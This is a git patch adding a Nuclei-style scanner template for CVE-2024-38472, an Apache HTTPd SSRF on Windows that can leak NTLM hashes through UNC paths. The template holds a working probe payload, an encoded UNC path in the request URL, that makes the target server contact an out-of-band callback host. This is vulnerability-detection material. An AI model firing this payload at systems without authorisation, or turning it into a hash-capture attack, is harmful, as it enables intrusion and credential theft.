From 85fd47adf766b3952691b3dcdda7087158b42c47 Mon Sep 17 00:00:00 2001 From: Ice3man Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH] Added template for CVE-2024-38472 --- CVE-2024-38472.yaml | 37 +++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 CVE-2024-38472.yaml diff --git a/CVE-2024-38472.yaml b/CVE-2024-38472.yaml new file mode 100644 index 0000000000..9786789423 --- /dev/null +++ b/CVE-2024-38472.yaml @@ -0,0 +1,37 @@ +id: CVE-2024-38472 + +info: + name: CVE-2024-38472 - Apache HTTPd Windows UNC SSRF + author: pdteam + severity: high + description: | + SSRF in Apache HTTP Server on Windows allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests or content + Users are recommended to upgrade to version 2.4.60 which fixes this issue. Note- Existing configurations that access UNC paths will have to configure new directive "UNCList" to allow access during request processing. + reference: + - https://blog.orange.tw/2024/08/confusion-attacks-en.html + - https://httpd.apache.org/security/vulnerabilities_24.html + - https://security.netapp.com/advisory/ntap-20240712-0001/ + - https://github.com/fkie-cad/nvd-json-data-feeds + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-38472 + cwe-id: CWE-918 + epss-score: 0.00043 + epss-percentile: 0.09569 + +http: + - path: + - "{{BaseURL}}/%5C%5C{{interactsh-url}}/apachehttpd" + method: GET + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + - type: word + part: interactsh_request + words: + - "/apachehttpd" + matchers-condition: and